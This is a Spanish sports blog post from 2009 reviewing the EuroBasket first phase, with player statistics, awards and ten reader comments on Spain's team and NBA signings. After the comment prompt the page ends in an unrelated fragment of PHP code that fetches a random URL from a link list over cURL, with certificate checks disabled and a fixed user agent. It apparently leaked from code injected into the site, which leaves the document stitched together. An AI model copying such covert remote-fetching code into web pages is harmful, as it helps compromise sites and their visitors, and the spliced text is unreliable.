EuroNBAsket: Fin de la primera fase

10 de September de 2009 por TheDeerHunter

A diferencia de la jornada anterior no hubo lugar a las sorpresas en el Eurobasket y quedan finalmente apeados de la competición Israel, Letonia, Gran Bretaña y Bulgaria.

De poco les sirvió a los letones ganar a Alemania. Sigo creyendo que son mejor equipo, pero los alemanes se han defendido bien en todos los partidos y han consgeuido llevarse el gato al agua gracias al basketaverage. Andris Biedrins concluye así un campeonato un tanto decepcionante. Ayer no estuvo mal con 10 puntos, 9 rebotes, todos ellos defensivos, pero sin embargo, su compañero Kambala le ha superado en protagonismo (sobre todo ofensivo) durante todo el campeonato.

Otro NBA que se vuelve para casa es Mensah-Bonsu que ayer volvió a ser el mejor de su equipo contra los Serbios. Menos mal que su peor partido fue contra España aunque sus compañeros bien podrían haber jugado contra los demás como lo hicieron contra los subcampeones olímpicos. Por Serbia, Nenad Krstic volvió a parecerse al del primer día con 17 puntos, 4 rebotes, 2 asistencias y buenos porcentajes.

España finalmente pasa a la siguiente fase bastante bien colocada, sufriendo como nunca, eso sí. De nuestros ÑBA quien mejor estuvo fue Rudy, 19 puntos, 5 rebotes y 2 asistencias bailando con la más fea en situación de desventaja. Nachbar había sido uno de los mejores 3 del campeonato hasta anoche pero el mallorquín fue mejor, imponiendo sus propias armas. Scariolo ha encontrado el alero que tanto buscaba. Veremos cómo se las ve para enfrentarse a Turkoglu.

Pau Gasol estuvo sólido, pero no brillante. 13 puntos nos saben a poco en su caso, pero capturó 9 rebotes, repartió 3 asistencias y por fin le vimos poner 2 tapones. Marc sigue sin arrancar a pesar de que hubo un par de momentos del primer cuarto en el que pudimos recordar al de la preparación. Lo único cierto es que ahora mismo entre él y Felipe Reyes no hay ningún color. Eso sí, no tengo claro que él se hubiera dejado coger el rebote que acabando desembocando en la prórroga.

Por parte de los eslovenos Dragic nos hizo polvo en la segunda parte. 6 robos del angelito (alguno de ellos regalado por su “gran amigo” Cabezas) que le permitieron cosernos a contraataques. 19 puntos que casi nos cuestan un disgusto gordo. Brezec fue al revés, empezó fuerte pero se fue diluyendo como un azucarillo. En su línea.

En Francia se salieron, ¿cómo no?, Tony Parker (17p 3reb 4asis 4rob), Diaw (19p 7reb y 7asis) y el siempre sorprendente Ronny Turiaf (18p 14reb) y con todo se las vieron y se las desearon para doblegar a Rusia. No se entiende muy bien cómo les cuesta tanto despegar a los franceses. Los croatas también las pasaron canutas contra Macedonia. Ukic, como sucede a menudo en partidos complicados, muy decepcionante.

Finalmente en el duelo estelar de esta primera fase Turquía estrenó el casillero de derrotas de Polonia. Gortat se confirmó como el mejor pívot de esta liguilla, con otro portento de 21 puntos y 7 rebotes. Su pareja en el equipo ideal sería Ilyasova, que registró 18 puntos y 7 rebotes. Turkoglu en esta ocasión estuvo “gris”, con 13 puntos, 8 rebotes  y 3 asistencias. Su equipo no echó en falta su anotación y son los que mejor han jugado hasta la fecha.

MVP: Por muchas razones… Rudy Fernandez. No necesita mucha más explicación.

La sorpresa: Ronny Turiaf, que bien puede llevarse el premio de esta edición.

La decepción: Bien podría ser Roko Ukic, aunque uno de lo de que Nicolas Batum no meta ni una sola canasta roza lo paranormal. Por sus quejas, parece ser que le sienta peor que absorva juego Parker que Brandon Roy. No sabemos si esto tendrá que ver con su irregularidad. No deja de ser curioso en todo caso.

El mayor esfuerzo en vano: Memsah-Bonsu se irá con un buen sabor de boca en lo individual. Tras su lamentable partido contra España anoche se marcó un partido de 16 puntos, 4 rebotes, 2 asistencias, 2 tapones y 1 robo… y lo que es más sorprendente aceptables porcentajes de tiro.

Comenta

10 comentarios a esta entrada

  1. SpaiNBA dice:
    #1

    ¿Rudy MVP?
    No sé yo, me suena un tanto forzado eh. A mí me gustó sobre todo su intensidad defensiva y sus números no están mal, pero…

    El tema de Batum es de Expediente X, en Portland le ha pasado lo mismo el 70% del año.

    PD: ojito con Grecia.

      Citar

  2. toni dice:
    #2

    España no puede sufrir esos parciales de 12-0 con 3 perdidas subiendo el balón, aunque lo mas fuerte de todo es que calderon estaba a 10m comentando el partido, por favor baja a la pista. Todo esto es debido al exceso de confianza al empezar el 4º periodo cuando ganaban de 15pts.
    Me gustó la pareja interior Felipe-Pau aunque Gasol está todavía lento en los desplazamientos y en las ayudas.
    Marc tuvo un par de momentos en los que me gustó mucho pero luego ya se apagó, sigo sin entenderlo.
    Buen Navarro sacando las castañas del fuego.
    Grandisimo Rudy que veremos a ver como se lo monta con Turkoglu.
    Enorme Felipe, que entrega tiene este hombre, a ver si se contagian todos un poco de él.

    Me gustó mucho el duo Dragic-Lakovic (está claro que fueron el motor de Eslovenia tras la desaparición de Brezec)
    Por cierto, me dió la impresión de que eran unos pasos clamorosos los de Lorbek en la canasta que provocó la prorroga. ¿Verdad?

    Turiaf, Gortat… ¿Sirven estos campeonatos para que los europeos se den/nos demos cuenta del nivel real de la nba en el que jugadores de segunda linea son capaces de dominar?
    (Por si no quedó claro con los JJOO que excepto la ÑBA…)

      Citar

  3. Txusma dice:
    #3

    Pasos como un castillo. De hecho recuerdo estar delante de la TV pensando: “Q más da si ha sido dentro o fuera de tiempo. Lo que son son PASOS!!”.
    Sobre lo q hablas de Gortat y Turiaf es normal. Esta gente esta acostumbrada a pegarse con gente como D.Howard, T.Chandler, A.Bynum, etc… armarios de 2 x 2 y ademas rapidisimos con lo que llegan aquí y les hacen un cuadro a casi todos los pívots europeos.

      Citar

  4. toni dice:
    #4

    Al margen de esto, ¿qué os parece el fichaje de Iverson por los Grizzlies?
    Marc no va a oler la pelota ni en los entrenos…
    Que poquitas buenas sensaciones me transmite ese equipo.

    ¡Qué llegue ya el sabado!

      Citar

  5. TheDeerHunter dice:
    #5

    Estoy seguro que recibirá más balones de Iverson que de nadie en ese equipo…

    y el sabado tengo una puñetera boda que no me dejará ver el partido

    aaaarrgh!!!

      Citar

  6. TheDeerHunter dice:
    #6

    @Spainba (que al cambiar tu nick te ha marcado el mensaje para aprobar… y por eso ha tardado en salir)

    A mí lo que me gustó de Rudy fue precísamente como resolvió el duelo contra Nahbar a su favor imponiendo sus recursos de escolta al mayor tamaño del esloveno, con los problemas físicos que lleva arrastrando y en las circunstancias tan especiales en las que se mueve la selección. Era una final.

    Podría haber elegido a Ilyasova, o a cualquiera de los franceses… sin embargo opino que todos ellos lo tenían significativamente más fácil que el marrón que se tenía que comer Rudy… aunque sólo fuera por el margen de error que contaban.

      Citar

  7. Óscar dice:
    #7

    Lo de Batum no sorprende tanto, todavía es un jugador en formación aunque haya sido titular como rookie en la NBA (por la lesión de Webster y con Outlaw como 6º hombre). Ha jugado 15 mins/partido y su rol en NBA es complementario, especialista defensivo y tiro exterior desde las esquinas sólo cuando le dejan tirar, por lo que sus porcentajes no han sido malos. Esto en el Europeo estaba claro que no iba a suceder (es uno de los hombres a vigilar en Francia), y no es un tirador sólido todavía. Lo mejor es su físico, que explotará cada vez más. Pero a día de hoy es un gran complemento, no un pilar (tiene 20 años…).
    En cuanto a Rudy vs. Eslovenia, estoy de acuerdo con Deer, me gustó que Scariolo lo metiese de inicio para retar con velocidad a Nachbar y contrarrestar su mayor altura. Lo mejor está por venir, con Pau, Rudy y Garbajosa creciendo físicamente a medida que avanza el campeonato. Es lo único bueno de haber empezado tan dubitativos el Europeo, que iremos seguro de menos a más.
    PD. Por cierto, entoces la respuesta al Trivial #2 era Gervin (de Sergio) y no la mía (Petrovic)? Yo lo he intentado, tampoco lo tenía muy claro… Esto mola.

      Citar

  8. L.Casei dice:
    #8

    Toni, sobre Iverson. En Memphis parece que han pensado: llegados a este punto, nos liamos la manta a la cabeza y fichamos a éste y a Randolph… Con la trayectoria que tienen en cuanto a resultados (22,22 y 24 victorias) y a imagen como franquicia en los últimos años, la verdad es que no tienen nada que perder. Al contrario. Si les sale mal, más de lo mismo; si va bien, perfecto.
    Yo, si tuviese que apostar, no daría mucho por ellos, pero nunca se sabe. Con A.I. y Zach intentan sobre todo llevar a más gente al FedEx Forum, una de las canchas más vacías la última campaña. No parece importarles que el vestuario vaya a ser una jauría, al fin y al cabo ya lo era.
    Sobre el papel, les ha quedado un equipo que no está mal en cuanto a nombres: Conley, Mayo, Gay, Randolph, M.Gasol / Iverson, Buckner, Young (R), Arthur, Thabeet (R), además de Jaric, Carroll (R) o Haddadi. Pero lo dicho, es toda una incógnita como va a responder una plantilla tan variopinta y con tantos egos. Lo lógico es pensar que será un equipo débil defensivamente (sobre todo en perímetro) y muy irregular en ataque, con muchos jugadores buscando números, y con malos porcentajes. No tienen especialistas ni de tiro, ni defensivos (salvo Buckner, que al final no se va a Dallas, o Thabeet, que es toda una incógnita).
    Pues eso, poco tienen que perder.

      Citar

  9. TheDeerHunter dice:
    #9

    Bueno… Batum en alguna ocasión me ha maravillado por sus condiciones, pero lo que me sorprende no es tanto que juegue bien o mal (que puede pasarle a cualquiera) sino las informaciones que me han llegado acerca de cuestionar el liderato de Tony Parker o de haberse quejado porque aquel absorbiera juego (cuando en los Blazers no le hemos oído decir ni mú en un caso muchísimo más sangrante)

    Tema España… me llama la atención que menciones a Garbajosa, cuando existe un run run de incluírlo en el eje del mal de todos los problemas (léase Cabezas-Mumbrú-Garbajosa) En su caso me parece más raro todavía, pues no ha llegado a jugar apenas. Cierto es contra Serbia lo hizo horripilántemente (¿el peor partido de su vida??) pero antes me había parecido que estaba bastante mejor físicamente que en las olimpiadas, incluso en el palizón de Lituania me pareció el mejor del equipo.
    Este equipo se ha basado siempre en el colectivo. Me parece un error ignorar a ciertos jugadores por muy mal que lo hayan hecho puntualmente… siguiendo ese criterio, quizás Navarro no hubiera jugado contra Eslovenia por ejemplo.
    Es prioritario recuperar a esos otros jugadores “irrecuperables” de los que se habla y esa sería la verdadera fuerza de España para volver a ser todo lo candidatos que éramos la semana pasada (aunque no dudo que quizás con únicamente Gasol, Rudy, Felipe y Navarro jugando bien podríamos incluso trincar el anillo) Garbajosa, por ejemplo, sería una interesante baza para defender a Turkoglu… no podemos jugarnos todo a la carta de que Rudy sea capaz de imponer su velocidad contra un tipo de su categoría.
    Intuyo que Marc y Ricky están cerca de recuperar su juego, Raul no lo ha hecho tan sumamente mal como para defenestrarlo, Claver debería darnos 5-10 minutos de calidad… y tanto Garba, como Mumbrú como Cabezas saben comerse el pan con corteza…
    Lo mismo Cabezas. No pudo jugar peor contra Eslovenia… pero al final tuvo que echarle pelotas y quedarse en primera línea en los minutos decisivos, porque Ricky estaba fuera. Y se defendió con orgullo en esos momentos a pesar de que quizás le hubiera gustado esconderse debajo de cualquier cama… a veces no vemos eso. Estoy seguro que es un palo que le hará reaccionar en lo que queda del campeonato.
    Con todo, fíjaos si le ganamos el sábado a Turquía, donde nos ponemos con todo lo que ha llovido.

      Citar

  10. Óscar dice:
    #10

    Deer, con lo de Garbajosa quería decir que también está con problemas físicos, según han dicho en la radio. Casi ninguno está a tope, y si no mirad una información de hoy de marca.com:
    ” Nueve de los doce jugadores de la selección española tienen golpes o están lesionados. “Sólo Llull, Claver y…, ahora no recuerdo quién es el tercero, podrían haber hecho un entrenamiento con contactos”, afirmó Scariolo. ”
    Tremendo, esperemos llegar bien al final… o al menos no tan mal. Si no, chungo lo tenemos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>